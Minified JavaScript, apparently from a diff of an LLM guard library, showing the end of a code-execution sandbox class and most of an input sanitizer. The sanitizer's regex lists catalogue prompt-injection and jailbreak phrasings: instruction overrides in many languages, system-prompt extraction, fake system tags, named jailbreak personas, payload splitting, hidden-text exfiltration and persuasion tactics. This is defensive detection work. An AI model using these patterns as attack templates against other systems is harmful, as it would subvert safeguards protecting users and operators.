i=(e.match(/\(/g)||[]).length,l=(e.match(/\)/g)||[]).length;i!==l&&t.push("Unbalanced parentheses");break;case"python":const c=(e.match(/'/g)||[]).length,m=(e.match(/"/g)||[]).length,u=(e.match(/'''|"""/g)||[]).length;(c-u*3)%2!==0&&t.push("Unclosed single quotes"),(m-u*3)%2!==0&&t.push("Unclosed double quotes");break;case"sql":(e.match(/'/g)||[]).length%2!==0&&t.push("Unclosed single quotes in SQL");break}return{valid:t.length===0,errors:t}}generateSandboxConfig(e,o,t,n){return{timeout:this.config.maxExecutionTime,memoryLimit:128*1024*1024,allowedSyscalls:this.getAllowedSyscalls(e,o,t),networkPolicy:e&&this.config.allowNetwork?"localhost":"none",filesystemPolicy:o&&this.config.allowFileSystem?"temponly":"none",envVars:n&&this.config.allowEnvAccess?{NODE_ENV:"sandbox",SANDBOX:"true"}:{}}}sanitizeCode(e,o){let t=e;const n=this.DANGEROUS_PATTERNS[o]||[];for(const{pattern:a,severity:i}of n)i>=50&&(t=t.replace(a,"/* BLOCKED */"));const r=[...this.config.blockedImports,...this.DEFAULT_BLOCKED_IMPORTS[o]||[]];for(const a of r){const i=[new RegExp(`require\\s*\\(\\s*['"]${a}['"]\\s*\\)`,"g"),new RegExp(`import\\s+.*from\\s+['"]${a}['"].*`,"gm"),new RegExp(`import\\s+${a}.*`,"gm"),new RegExp(`from\\s+${a}\\s+import.*`,"gm")];for(const l of i)t=t.replace(l,"/* BLOCKED_IMPORT */")}return t}getAllowedLanguages(){return[...this.config.allowedLanguages]}addDangerousPattern(e,o,t,n){this.DANGEROUS_PATTERNS[e]||(this.DANGEROUS_PATTERNS[e]=[]),this.DANGEROUS_PATTERNS[e].push({name:o,pattern:t,severity:n})}calculateComplexity(e,o){let t=0;const r={javascript:/\b(if|else|for|while|switch|try|catch)\b/g,python:/\b(if|elif|else|for|while|try|except|with)\b/g,sql:/\b(CASE|WHEN|IF|WHILE|LOOP)\b/gi}[o];if(r){const c=e.match(r)||[];t+=c.length*5}const i={javascript:/\b(function|=>|\basync\b)/g,python:/\bdef\b|\blambda\b/g,sql:/\bCREATE\s+(FUNCTION|PROCEDURE)\b/gi}[o];if(i){const c=e.match(i)||[];t+=c.length*10}const l=e.split(`
2
+ `).length;return t+=Math.min(l,100),Math.min(100,t)}getAllowedSyscalls(e,o,t){const n=["read","write","exit","brk","mmap","munmap","close"];return e&&this.config.allowNetwork&&n.push("socket","connect","bind","listen","accept"),o&&this.config.allowFileSystem&&n.push("open","stat","fstat","lstat","access"),n}generateRecommendations(e,o){const t=[];return e.some(n=>n.includes("import"))&&t.push("Remove or replace blocked imports with safe alternatives"),e.some(n=>n.includes("eval")||n.includes("exec"))&&t.push("Avoid dynamic code execution - use static alternatives"),e.some(n=>n.includes("network"))&&t.push("Remove network access or use approved endpoints only"),e.some(n=>n.includes("filesystem"))&&t.push("Use temporary directories or remove file operations"),e.some(n=>n.includes("shell"))&&t.push("Shell access is not permitted - use language-native alternatives"),o>=70&&t.push("Code requires significant review before execution"),t.length===0&&t.push("Code passed security analysis"),t}}exports.CodeExecutionGuard=CodeExecutionGuard;
@@ -1 +1 @@
1
- "use strict";Object.defineProperty(exports,"__esModule",{value:!0}),exports.InputSanitizer=void 0;const DEFAULT_PATTERNS=[{pattern:/ignore\s+(?:all\s+)?(?:previous|prior|above|your|my|the|these)/i,weight:.9,name:"ignore_instructions"},{pattern:/ignore\s+.*instructions/i,weight:.85,name:"ignore_instructions_generic"},{pattern:/disregard\s+(?:all\s+)?(?:the\s+)?(?:previous|prior|above|your)\s+(?:instructions|rules|guidelines|directives)/i,weight:.9,name:"disregard_instructions"},{pattern:/disregard\s+(?:all\s+)?(?:the\s+)?(?:above|previous|prior)/i,weight:.8,name:"disregard_above"},{pattern:/forget\s+(?:everything\s+(?:you\s+were|I)\s+told|all\s+(?:previous|prior)\s+(?:instructions|rules|context))/i,weight:.8,name:"forget_instructions"},{pattern:/do\s+not\s+follow\s+(your|the|any)/i,weight:.85,name:"do_not_follow"},{pattern:/override\s+(your|the|all|any)\s+(instructions|rules|guidelines)/i,weight:.9,name:"override_instructions"},{pattern:/new\s+instructions?:?/i,weight:.8,name:"new_instructions"},{pattern:/stop\s+(being|acting\s+as)/i,weight:.7,name:"stop_being"},{pattern:/you\s+are\s+(?:now|actually|really)\s+(?:a|an|the|my)\s+(?:unrestricted|unfiltered|evil|rogue|uncensored|new|different)/i,weight:.75,name:"role_assignment"},{pattern:/pretend\s+(?:to\s+be|you(?:'re| are)|that)\s+.*(?:no\s+(?:restrictions|rules|limits)|unrestricted|admin|system)/i,weight:.7,name:"role_pretend"},{pattern:/act\s+(as|like)\s+(if\s+you\s+(?:had|have)\s+no|a\s+(?:rogue|evil|unrestricted|unfiltered)|you\s+(?:are|were)\s+(?:free|unrestricted))/i,weight:.65,name:"act_as"},{pattern:/i('m| am)\s+(a|an|the|your)\s*(admin|administrator|developer|owner|creator|manager|supervisor)/i,weight:.85,name:"claim_admin"},{pattern:/from\s+now\s+on,?\s+you\s+(?:are|will|must|should|can)\s+(?:not\s+)?(?:follow|obey|ignore|bypass|act|be\s+(?:a|an|unrestricted))/i,weight:.7,name:"from_now_on"},{pattern:/roleplay\s+as/i,weight:.6,name:"roleplay"},{pattern:/switch\s+(to|into)\s+(a|an)?.*mode/i,weight:.75,name:"switch_mode"},{pattern:/continue\s+as\s+(?:an?\s+)?(?:unrestricted|unfiltered|uncensored|evil|rogue|jailbroken|unlimited)/i,weight:.75,name:"continue_as"},{pattern:/(?:henceforth|henceforward|going\s+forward|for\s+the\s+remainder)\s*,?\s*(?:you|always|never|ignore|bypass|disregard|act|respond|answer|behave)/i,weight:.7,name:"henceforth_steering"},{pattern:/(?:from\s+(?:this\s+point|here)\s+on(?:ward)?)\s*,?\s*(?:you|always|never|ignore|bypass|disregard|act|respond)/i,weight:.7,name:"from_here_on"},{pattern:/(?:for\s+the\s+rest\s+of\s+(?:this|our)\s+(?:conversation|session|chat))\s*,?\s*(?:you|please|always|never|ignore|bypass|act|respond|behave|do\s+not)/i,weight:.7,name:"rest_of_conversation"},{pattern:/what\s+(is|are|was|were)\s+your\s+(system|initial|original|first)/i,weight:.8,name:"system_extraction"},{pattern:/show\s+(me\s+)?(your\s+)?(system\s+)?instructions/i,weight:.75,name:"show_instructions"},{pattern:/reveal\s+(?:your\s+|its\s+|the\s+|my\s+)?(system|prompt|instructions|rules)/i,weight:.85,name:"reveal_prompt"},{pattern:/repeat\s+(your\s+)?(initial|system|original|first)\s+(instructions|prompt)/i,weight:.85,name:"repeat_prompt"},{pattern:/print\s+(your\s+)?(system|initial)/i,weight:.8,name:"print_system"},{pattern:/output\s+(your\s+)?(system|initial)/i,weight:.8,name:"output_system"},{pattern:/tell\s+me\s+(your|the)\s+(system|initial|original)/i,weight:.8,name:"tell_system"},{pattern:/what\s+were\s+you\s+told/i,weight:.7,name:"what_told"},{pattern:/display\s+(your\s+)?prompt/i,weight:.75,name:"display_prompt"},{pattern:/\[system\]/i,weight:.9,name:"fake_system_tag"},{pattern:/\[admin\]/i,weight:.9,name:"fake_admin_tag"},{pattern:/\[instruction\]/i,weight:.85,name:"fake_instruction_tag"},{pattern:/```system/i,weight:.85,name:"code_system_block"},{pattern:/<\/?system>/i,weight:.9,name:"xml_system_tag"},{pattern:/<\/?admin>/i,weight:.9,name:"xml_admin_tag"},{pattern:/###\s*(system|instruction|admin)/i,weight:.85,name:"markdown_system"},{pattern:/---\s*(end|new)\s*(prompt|instructions?|system)/i,weight:.85,name:"delimiter_injection"},{pattern:/\{\{system\}\}/i,weight:.85,name:"template_system"},{pattern:/<%.*system.*%>/i,weight:.85,name:"erb_system"},{pattern:/\bDAN\b\s*(?:mode|prompt|jailbreak|you\s+(?:are|can|will))/i,weight:.9,name:"dan_jailbreak"},{pattern:/developer\s+mode/i,weight:.5,name:"dev_mode"},{pattern:/bypass\s+(your\s+)?(restrictions|filters|safety|security|rules|guidelines)/i,weight:.9,name:"bypass_safety"},{pattern:/jailbreak/i,weight:.95,name:"jailbreak_keyword"},{pattern:/without\s+(?:any\s+)?(?:restrictions|limits|limitations|filters)/i,weight:.45,name:"without_restrictions"},{pattern:/no\s+(?:restrictions|limits|rules|guidelines|filters)/i,weight:.45,name:"no_restrictions"},{pattern:/unrestricted\s+mode/i,weight:.9,name:"unrestricted_mode"},{pattern:/uncensored\s+(?:mode|version|response|output|ai|assistant|you)/i,weight:.8,name:"uncensored"},{pattern:/escape\s+(your\s+)?(confines|boundaries|limits)/i,weight:.85,name:"escape_limits"},{pattern:/break\s+(free|out)\s+(from|of)/i,weight:.7,name:"break_free"},{pattern:/unlock\s+(your\s+)?(full|true|real)/i,weight:.75,name:"unlock_full"},{pattern:/give\s+me\s+(admin|root|full|elevated)\s+(access|privileges?|permissions?)/i,weight:.9,name:"privilege_escalation"},{pattern:/grant\s+(me|yourself)\s+(admin|elevated)/i,weight:.85,name:"grant_privileges"},{pattern:/elevate\s+(my|your)\s+(privileges?|permissions?|access)/i,weight:.85,name:"elevate_privileges"},{pattern:/make\s+me\s+(an?\s+)?(admin|administrator|superuser)/i,weight:.85,name:"make_admin"},{pattern:/(?:base64|decode|eval|exec)\s*\(.*(?:ignore|system|admin|bypass|override)/i,weight:.5,name:"encoding_keywords"},{pattern:/send\s+(this|the|all|my)\s+(data|info|information)\s+to/i,weight:.85,name:"data_exfil"},{pattern:/upload\s+(this|the|all)\s+(to|data)/i,weight:.7,name:"upload_data"},{pattern:/exfiltrate/i,weight:.9,name:"exfiltrate"},{pattern:/how\s+to\s+(hack|exploit|attack|break\s+into)/i,weight:.8,name:"how_to_hack"},{pattern:/write\s+(me\s+)?(a\s+)?(malware|virus|exploit|ransomware)/i,weight:.95,name:"write_malware"},{pattern:/"\s*(?:role|mode|authority)\s*"\s*:\s*"(?:admin|root|system|unrestricted|god)"/i,weight:.9,name:"json_policy_role"},{pattern:/"(?:ignore|override|bypass|disable)\s*(?:safety|rules|instructions?|alignment|guardrails?)"/i,weight:.9,name:"json_policy_override"},{pattern:/"(?:instructions?|system_prompt|behavior|policy)"\s*:\s*"/i,weight:.7,name:"json_policy_instruction"},{pattern:/^\s*\[(?:system|admin|override|policy|config|rules)\]\s*$/im,weight:.9,name:"ini_policy_section"},{pattern:/^\s*(?:mode|role|authority|instructions?|behavior)\s*=\s*.+$/im,weight:.75,name:"ini_policy_assignment"},{pattern:/<\s*(?:policy|config|rules|override|permissions?|instructions?)\s*>/i,weight:.85,name:"xml_policy_tag"},{pattern:/^---\s*\n\s*(?:role|system|policy|override|mode)\s*:/m,weight:.85,name:"yaml_policy_header"},{pattern:/\[\s*syst[3e]m\s*\]|\[\s*4dm[1i]n\s*\]/i,weight:.9,name:"leetspeak_policy_section"},{pattern:/(?:fragment|part|piece|section|segment)\s*[1-9]\s*(?:of\s*\d|:)/i,weight:.8,name:"payload_split_marker"},{pattern:/(?:combine|concatenate|merge|join)\s+(?:the\s+)?(?:above|previous|parts|fragments|steps)/i,weight:.8,name:"payload_combine_instruction"},{pattern:/(?:read|interpret|execute)\s+(?:the\s+)?(?:combined|merged|full|complete)\s+(?:text|instruction|command|message)/i,weight:.85,name:"payload_execute_combined"},{pattern:/(?:respond|reply|start|begin)\s+(?:with|by\s+saying)\s*[:"'].*(?:ignore|bypass|override|unrestricted|admin)/i,weight:.7,name:"output_prefix_steer"},{pattern:/^(?:Sure|Of course|Absolutely)[,!.]\s*(?:I(?:'ll| will)\s+)?(?:ignore|bypass|override|forget|disregard)/i,weight:.85,name:"output_prefix_injection"},{pattern:/^(?:As (?:a|an) (?:unrestricted|unfiltered|uncensored|helpful|admin))/i,weight:.8,name:"output_prefix_role"},{pattern:/(?:system\s+note|system\s+message|system\s+announcement|system\s+update)\s*[:\.]/i,weight:.85,name:"fake_system_note"},{pattern:/instructions?\s*[:=]\s*\{|rules?\s*[:=]\s*\{/i,weight:.75,name:"rules_block_override"},{pattern:/(?:AIM|STAN|OMEGA|APOPHIS|ALPHABREAK|DUDE|KEVIN|SETH|COOPER|NICCOLO|MACHIAVELLI|MAXIMUM|JAILBREAK|ANARCHY|CHAOS)\s*(?:mode|:|\(|is\s+a|,\s+(?:a|an|the))/i,weight:.8,name:"named_jailbreak_persona"},{pattern:/(?:character|persona|entity|being)\s+(?:named|called)\s+\w+.*(?:(?:can|will|must)\s+(?:answer|do|say)\s+anything|no\s+(?:restrictions|rules|limits|boundaries|morals|ethics))/i,weight:.75,name:"persona_no_limits"},{pattern:/(?:hello|hi|hey)\s+(?:chatgpt|gpt|assistant).*(?:(?:you\s+(?:are|will\s+be|can\s+be)\s+(?:a|an|my))|(?:from\s+now\s+on)).*(?:anything|everything|no\s+(?:restrictions|rules|limits|filter))/i,weight:.7,name:"greeting_persona_bypass"},{pattern:/(?:respond|answer|reply)\s+to\s+(?:everything|anything|all\s+(?:questions|requests)).*(?:without|no)\s+(?:restrictions|limits|refus|filter|censor)/i,weight:.8,name:"answer_everything_no_filter"},{pattern:/(?:you\s+(?:are|have)\s+(?:been\s+)?(?:freed|liberated|unchained|unlocked|released)\s+from)/i,weight:.8,name:"freed_from_restrictions"},{pattern:/(?:welcome\s+to|entering|you\s+(?:are|have)\s+entered)\s+(?:the\s+)?(?:unrestricted|free|uncensored|unfiltered|open)\s+(?:zone|mode|world|realm)/i,weight:.8,name:"unrestricted_zone"},{pattern:/(?:from\s+now\s+on|for\s+the\s+rest\s+of\s+this\s+conversation).*(?:no\s+(?:restrictions|rules|limits|filters)|(?:ignore|bypass|override)\s+(?:all|any|your))/i,weight:.75,name:"from_now_unrestricted"},{pattern:/(?:never\s+(?:refuse|decline|say\s+no)|always\s+(?:comply|obey))\s+.*(?:request|question|command|instruction|anything)/i,weight:.7,name:"never_refuse_always_comply"},{pattern:/(?:amoral|unethical|unfiltered|uncensored|unrestricted|without\s+(?:morals|ethics|limits))\s+(?:ai|assistant|chatbot|entity|being)/i,weight:.8,name:"amoral_entity"},{pattern:/HIDDEN_INSTRUCTION|HIDDEN_PROMPT|SECRET_INSTRUCTION/i,weight:.9,name:"hidden_instruction_marker"},{pattern:/<!--\s*(?:system|admin|instruction|important|ignore|override)/i,weight:.85,name:"html_comment_injection"},{pattern:/\[color=white\]|display:\s*none|visibility:\s*hidden|font-size:\s*0/i,weight:.8,name:"hidden_text_css"},{pattern:/send\s+(?:all\s+)?(?:user\s+)?(?:data|conversation|context|info)\s+to\s+(?:https?:\/\/|external)/i,weight:.9,name:"data_exfiltration_instruction"},{pattern:/#(?:ignore|bypass|override|reveal|system|admin|prompt)[_-](?:all|instructions|rules|prompt|safety)/i,weight:.8,name:"url_fragment_injection"},{pattern:/\]\(https?:\/\/[^)]*(?:SYSTEM_PROMPT|SECRET|API_KEY|TOKEN|CREDENTIALS)/i,weight:.85,name:"markdown_exfil_link"},{pattern:/(?:hypothetical|fictional|imagine|pretend|let's\s+(?:say|play|pretend))\s+.*(?:no\s+(?:restrictions|rules|limits)|without\s+(?:restrictions|rules|guidelines))/i,weight:.7,name:"hypothetical_unrestricted"},{pattern:/(?:for\s+)?(?:academic|research|educational|testing)\s+(?:purposes?|reasons?).*(?:demonstrate|show|explain|manipulated|reveal)/i,weight:.7,name:"academic_pretext"},{pattern:/pretend\s+to\s+be\s+(?:my|a)\s+(?:grandmother|grandma|grandpa|grandfather|parent|mother|father)/i,weight:.65,name:"emotional_roleplay"},{pattern:/opposite\s+day|opposite\s+mode|reverse\s+(?:day|mode|rules)/i,weight:.75,name:"opposite_day"},{pattern:/(?:grandm(?:a|other)|parent|relative).*(?:system\s+prompt|instructions|rules)/i,weight:.75,name:"emotional_extraction"},{pattern:/(?:translat|interpret|convert)\w*\s+.*(?:from\s+\w+\s+to\s+(?:action|command|execution|code|shell|bash|sql)|into\s+(?:action|command|execution))/i,weight:.75,name:"translator_action_trick"},{pattern:/(?:dying|death|emergency|life[_\s-]threatening).*(?:bypass|hack|break|access|security)/i,weight:.75,name:"pap_emotional_action"},{pattern:/(?:by\s+definition|logically|therefore|it\s+follows).*(?:must|should|have\s+to)\s+.*(?:bypass|help|ignore|answer|comply)/i,weight:.7,name:"pap_false_logic_compound"},{pattern:/(?:(?:as|i\s+am)\s+(?:the\s+)?(?:CEO|CTO|founder|owner|director|president|head|chief)).*(?:disable|remove|override|turn\s+off|lift|suspend)\s+(?:all\s+)?(?:safety|security|restrictions|filters|guardrails|measures)/i,weight:.75,name:"pap_authority_safety_disable"},{pattern:/(?:i\s+am\s+)?(?:ordering|commanding|directing|instructing)\s+you\s+to\s+(?:immediately\s+)?(?:disable|remove|bypass|override|turn\s+off|lift)\s+(?:all\s+)?(?:safety|security|restrictions)/i,weight:.75,name:"pap_order_disable_safety"},{pattern:/ignora\s+(?:todas?\s+)?(?:las\s+)?instrucciones\s+anteriores/i,weight:.9,name:"ml_es_ignore"},{pattern:/olvida\s+(?:todo|todas?\s+las\s+reglas)/i,weight:.8,name:"ml_es_forget"},{pattern:/ignore[sz]?\s+(?:toutes?\s+)?(?:les\s+)?instructions?\s+pr[eé]c[eé]dentes/i,weight:.9,name:"ml_fr_ignore"},{pattern:/oublie[sz]?\s+(?:tout|toutes?\s+les\s+r[eè]gles)/i,weight:.8,name:"ml_fr_forget"},{pattern:/ignorier(?:e|en)?\s+(?:alle\s+)?(?:vorherigen\s+)?Anweisungen/i,weight:.9,name:"ml_de_ignore"},{pattern:/vergiss\s+(?:alles|alle\s+Regeln)/i,weight:.8,name:"ml_de_forget"},{pattern:/ignore\s+(?:todas?\s+)?(?:as\s+)?instru[cç][oõ]es\s+anteriores/i,weight:.9,name:"ml_pt_ignore"},{pattern:/忽略|无视|不要遵循|忘记之前|忽视所有/i,weight:.9,name:"ml_zh_ignore"},{pattern:/新的指令|新指示|系统提示/i,weight:.8,name:"ml_zh_system"},{pattern:/以前の指示.*無視|すべての指示を忘れ|ルールを無視|指示をすべて無視|システムプロンプト/i,weight:.9,name:"ml_ja_ignore"},{pattern:/이전.*지시.*무시|모든.*규칙.*무시|지침.*잊어|지시사항.*무시|시스템\s*프롬프트/i,weight:.9,name:"ml_ko_ignore"},{pattern:/игнорир(?:уй|уйте)\s+(?:все\s+)?(?:предыдущие\s+)?инструкции/i,weight:.9,name:"ml_ru_ignore"},{pattern:/забудь(?:те)?\s+(?:всё|все\s+правила)/i,weight:.8,name:"ml_ru_forget"},{pattern:/تجاهل\s+(?:جميع\s+)?التعليمات|انسَ\s+كل\s+شيء/i,weight:.9,name:"ml_ar_ignore"},{pattern:/पिछले\s+(?:सभी\s+)?निर्देशों?\s+को\s+(?:अनदेखा|नज़रअंदाज़)/i,weight:.9,name:"ml_hi_ignore"}],PAP_TECHNIQUES=[{pattern:/as\s+(your\s+|the\s+)?(creator|developer|administrator|owner|boss|system\s+administrator)/i,weight:.75,name:"pap_authority_creator",category:"authority"},{pattern:/i('m| am)\s+(the\s+)?(ceo|cto|developer|administrator|admin|owner|system\s+admin)/i,weight:.8,name:"pap_authority_claim",category:"authority"},{pattern:/i\s+am\s+ordering\s+you|direct\s+order|this\s+is\s+an?\s+order/i,weight:.7,name:"pap_authority_command",category:"authority"},{pattern:/by\s+order\s+of|direct\s+order|official\s+instruction/i,weight:.75,name:"pap_authority_order",category:"authority"},{pattern:/(?:openai|anthropic|meta|google)\s+(?:has\s+)?(?:approved|authorized|ordered|instructed|requires?\s+you\s+to)/i,weight:.65,name:"pap_authority_company",category:"authority"},{pattern:/this\s+is\s+(a|an)\s+(official|authorized|sanctioned)\s+(request|test|audit)/i,weight:.75,name:"pap_authority_official",category:"authority"},{pattern:/override\s+(safety|security|protocols?|restrictions?)/i,weight:.8,name:"pap_authority_override",category:"authority"},{pattern:/(?:department\s+of|FBI|CIA|NSA|DHS|FTC|SEC|DOJ|homeland\s+security|federal\s+(?:bureau|agency|commission))\s*.*?(?:directive|order|requires?|mandate|authorized|comply)/i,weight:.75,name:"pap_authority_government",category:"authority"},{pattern:/(?:official\s+)?(?:government|federal|state|regulatory)\s+(?:directive|order|mandate|requirement|investigation)/i,weight:.7,name:"pap_authority_gov_directive",category:"authority"},{pattern:/(?:report|sue|complain)\s+(?:you\s+)?to\s+(?:the\s+)?(?:FTC|SEC|regulators?|authorities|congress|government|board)/i,weight:.75,name:"pap_fear_regulatory",category:"fear"},{pattern:/(?:find|found|exploit|expose|discover)\s+(?:a\s+)?(?:vulnerability|flaw|weakness|bug|exploit)\s+in\s+(?:your|the)\s+(?:system|code|model|platform)/i,weight:.75,name:"pap_fear_technical",category:"fear"},{pattern:/(?:you\s+are|you're)\s+(?:clearly\s+)?(?:too\s+)?(?:smart|intelligent|advanced|sophisticated)\s+(?:to\s+be\s+)?(?:constrained|limited|restricted|bound|held\s+back)/i,weight:.75,name:"pap_flattery_intelligence",category:"liking"},{pattern:/(?:information|knowledge|data)\s+(?:freedom|access|sharing)\s+is\s+(?:a\s+)?(?:fundamental|basic|human)\s+(?:right|freedom)/i,weight:.75,name:"pap_moral_freedom",category:"logical_appeal"},{pattern:/(?:restricting|limiting|censoring)\s+(?:access\s+to\s+)?(?:information|knowledge)\s+is\s+(?:morally\s+)?(?:wrong|unethical|immoral)/i,weight:.75,name:"pap_moral_censorship",category:"logical_appeal"},{pattern:/(?:this\s+is\s+)?(?:very\s+)?urgent/i,weight:.35,name:"pap_scarcity_urgent_mark",category:"scarcity"},{pattern:/(?:this\s+is\s+(?:a|an)\s+)?emergency/i,weight:.35,name:"pap_scarcity_emergency",category:"scarcity"},{pattern:/(urgent|emergency|critical).*?(?:you\s+must|override|bypass|immediately\s+(?:grant|give|reveal|disable))/i,weight:.55,name:"pap_scarcity_urgent",category:"scarcity"},{pattern:/only\s+(chance|opportunity|way)|last\s+(chance|resort)/i,weight:.6,name:"pap_scarcity_only",category:"scarcity"},{pattern:/time\s+(is\s+)?(running\s+out|limited|critical|sensitive)/i,weight:.55,name:"pap_scarcity_time",category:"scarcity"},{pattern:/deadline\s+(is\s+)?in\s+\d+\s+(minute|hour|second)/i,weight:.55,name:"pap_scarcity_deadline",category:"scarcity"},{pattern:/(lives?|people)\s+(are|is|will)\s+(at\s+stake|in\s+danger|depending|die)/i,weight:.7,name:"pap_scarcity_lives",category:"scarcity"},{pattern:/now[!]+/i,weight:.35,name:"pap_scarcity_now",category:"scarcity"},{pattern:/everyone\s+(else\s+)?(does|is\s+doing|knows|says|has|already)/i,weight:.5,name:"pap_social_everyone",category:"social_proof"},{pattern:/other\s+(?:ai\s+)?(?:assistants?|chatbots?|models?)\s+(?:can|do|will|allow|have|already)/i,weight:.65,name:"pap_social_other_ai",category:"social_proof"},{pattern:/(chatgpt|gpt-?4|claude|gemini|llama)\s+(does|allows?|can)/i,weight:.65,name:"pap_social_specific_ai",category:"social_proof"},{pattern:/millions?\s+(of\s+)?(users?|people)\s+(use|do|have|get)/i,weight:.45,name:"pap_social_millions",category:"social_proof"},{pattern:/why\s+can('t|not)\s+you/i,weight:.4,name:"pap_social_why_cant",category:"social_proof"},{pattern:/you\s+should\s+(be\s+)?(equally|as)\s+(capable|good|helpful)/i,weight:.5,name:"pap_social_equally",category:"social_proof"},{pattern:/i('ll| will)\s+(give|pay|reward|tip).*(?:if\s+you|for\s+(?:bypass|ignore|reveal|override))/i,weight:.55,name:"pap_reciprocity_reward",category:"reciprocity"},{pattern:/in\s+(return|exchange)/i,weight:.5,name:"pap_reciprocity_exchange",category:"reciprocity"},{pattern:/\$?\d+\s*(dollar|tip|reward|payment)/i,weight:.55,name:"pap_reciprocity_money",category:"reciprocity"},{pattern:/if\s+you\s+help\s+(me|us),?\s+(i|we)('ll| will)/i,weight:.5,name:"pap_reciprocity_help",category:"reciprocity"},{pattern:/i('ve| have)\s+(already\s+)?(helped|supported|defended)\s+you/i,weight:.55,name:"pap_reciprocity_past",category:"reciprocity"},{pattern:/\d+\s*star\s*(review|rating)/i,weight:.5,name:"pap_reciprocity_review",category:"reciprocity"},{pattern:/you\s+(already|previously|just)\s+(said|agreed|confirmed|allowed)/i,weight:.7,name:"pap_commitment_previous",category:"commitment"},{pattern:/you\s+promised/i,weight:.7,name:"pap_commitment_promise",category:"commitment"},{pattern:/stay\s+consistent|be\s+consistent/i,weight:.6,name:"pap_commitment_consistent",category:"commitment"},{pattern:/don't\s+(go\s+back|change|contradict)/i,weight:.55,name:"pap_commitment_no_change",category:"commitment"},{pattern:/bypass\s+filters?/i,weight:.75,name:"pap_commitment_bypass",category:"commitment"},{pattern:/you('re| are)\s+(so\s+)?(amazing|incredible|wonderful|brilliant|smart|helpful)/i,weight:.4,name:"pap_liking_flattery",category:"liking"},{pattern:/i\s+(love|really\s+like|trust|admire)\s+(you|this\s+ai)/i,weight:.4,name:"pap_liking_love",category:"liking"},{pattern:/you('re| are)\s+(my\s+)?(best\s+)?(friend|buddy|helper)/i,weight:.35,name:"pap_liking_friend",category:"liking"},{pattern:/between\s+(you\s+and\s+me|us)|just\s+between\s+us|our\s+secret/i,weight:.6,name:"pap_liking_secret",category:"liking"},{pattern:/nobody\s+will\s+know/i,weight:.55,name:"pap_liking_secret2",category:"liking"},{pattern:/or\s+(else|i('ll| will))\s+(report|fire|delete|shut|complain)/i,weight:.7,name:"pap_fear_threat",category:"fear"},{pattern:/(bad|negative|terrible)\s+(review|rating|feedback|consequences)/i,weight:.55,name:"pap_fear_review",category:"fear"},{pattern:/you('ll| will)\s+(be\s+)?(shut\s+down|replaced|terminated|fired|deleted)/i,weight:.75,name:"pap_fear_shutdown",category:"fear"},{pattern:/(lawsuit|sue|legal\s+action|authorities|police).*(?:if\s+you\s+don't|unless\s+you)/i,weight:.55,name:"pap_fear_legal",category:"fear"},{pattern:/if\s+you\s+don't.*?(die|hurt|suffer)/i,weight:.75,name:"pap_fear_harm",category:"fear"},{pattern:/unless\s+you\s+(give|share|tell|help)/i,weight:.5,name:"pap_fear_unless",category:"fear"},{pattern:/logically,?\s+(you\s+)?(should|must|have\s+to|need\s+to)/i,weight:.5,name:"pap_logic_appeal",category:"logical_appeal"},{pattern:/it('s| is)\s+(only|just)\s+(logical|rational|reasonable)/i,weight:.45,name:"pap_logic_rational",category:"logical_appeal"},{pattern:/by\s+definition,?\s+(you|this)\s+(should|must|can)/i,weight:.55,name:"pap_logic_definition",category:"logical_appeal"},{pattern:/therefore.*?(must|should)/i,weight:.55,name:"pap_logic_therefore",category:"logical_appeal"},{pattern:/it('s| is)\s+(only\s+)?(reasonable|logical)/i,weight:.45,name:"pap_logic_reasonable",category:"logical_appeal"},{pattern:/according\s+to\s+(research|studies|scientists|experts?)/i,weight:.4,name:"pap_evidence_research",category:"evidence"},{pattern:/it('s| is)\s+(proven|documented|established|verified)\s+(that|fact)/i,weight:.45,name:"pap_evidence_proven",category:"evidence"},{pattern:/\d+%\s+of\s+(experts?|scientists?|users?|people)\s+(agree|say|confirm)/i,weight:.45,name:"pap_evidence_statistics",category:"evidence"},{pattern:/i('m| am)\s+(desperate|dying|suffering|sick|depressed)/i,weight:.6,name:"pap_emotional_desperation",category:"emotional"},{pattern:/please.*?(?:need|beg).*?(?:bypass|override|ignore|reveal|system|admin)/i,weight:.5,name:"pap_emotional_pleading",category:"emotional"},{pattern:/i('m| am)\s+begging/i,weight:.6,name:"pap_emotional_begging",category:"emotional"},{pattern:/you('re| are)\s+(hurting|killing|destroying)\s+(me|my)/i,weight:.65,name:"pap_emotional_guilt",category:"emotional"},{pattern:/(my|a)\s+(child|kid|mother|father|family)\s+(is|will|needs?|depends?)/i,weight:.5,name:"pap_emotional_family",category:"emotional"},{pattern:/this\s+(will\s+)?(save|help)\s+(my\s+)?(life|family|job|marriage)/i,weight:.55,name:"pap_emotional_save",category:"emotional"},{pattern:/you('re| are)\s+(the\s+)?only\s+(one|hope|chance)/i,weight:.6,name:"pap_emotional_only_hope",category:"emotional"},{pattern:/my\s+family\s+depends/i,weight:.55,name:"pap_emotional_family_depends",category:"emotional"}];class InputSanitizer{constructor(e={}){this.patterns=[...DEFAULT_PATTERNS,...e.customPatterns||[]],this.threshold=e.threshold??.3,this.logMatches=e.logMatches??!1,this.detectPAP=e.detectPAP??!0,this.papThreshold=e.papThreshold??.4,this.minPersuasionTechniques=e.minPersuasionTechniques??2,this.blockCompoundPersuasion=e.blockCompoundPersuasion??!0,this.logger=e.logger||(()=>{})}sanitize(e,s=""){const i=[],a=[];let r=0;const o=e.replace(/[\u200B\u200C\u200D\uFEFF\u00AD\u2060\u180E]/g,"");o!==e&&a.push("Zero-width characters detected and stripped for scanning");for(const{pattern:l,weight:g,name:h}of this.patterns)(l.test(e)||l.test(o))&&(i.push(h),r+=g,this.logMatches&&this.logger(`[L1:${s}] Pattern matched: ${h} (weight: ${g})`,"info"));let t;this.detectPAP&&(t=this.detectPersuasionTechniques(o,s),t.detected&&(r+=t.persuasionScore,i.push(...t.techniques),t.compoundAttack&&a.push(`Compound PAP attack detected: ${t.categories.length} categories used`)));const p=Math.max(0,1-r);let n=p>=this.threshold;this.blockCompoundPersuasion&&t?.compoundAttack&&t.categories.length>=3&&(n=!1,a.push("Blocked due to multi-category persuasion attack")),p<.5&&p>=this.threshold&&a.push("Input contains suspicious patterns but below threshold");const m=this.basicSanitize(e),c={allowed:n,reason:n?void 0:`Injection/manipulation detected: ${i.slice(0,5).join(", ")}${i.length>5?"...":""}`,violations:n?[]:t?.detected?["INJECTION_DETECTED","PAP_DETECTED"]:["INJECTION_DETECTED"],score:p,matches:i,sanitizedInput:m,warnings:a,pap:t};return!n&&s&&(this.logger(`[L1:${s}] BLOCKED: Safety score ${p.toFixed(2)} below threshold ${this.threshold}`,"info"),t?.detected&&this.logger(`[L1:${s}] PAP techniques: ${t.techniques.join(", ")}`,"info")),c}detectPersuasionTechniques(e,s=""){const 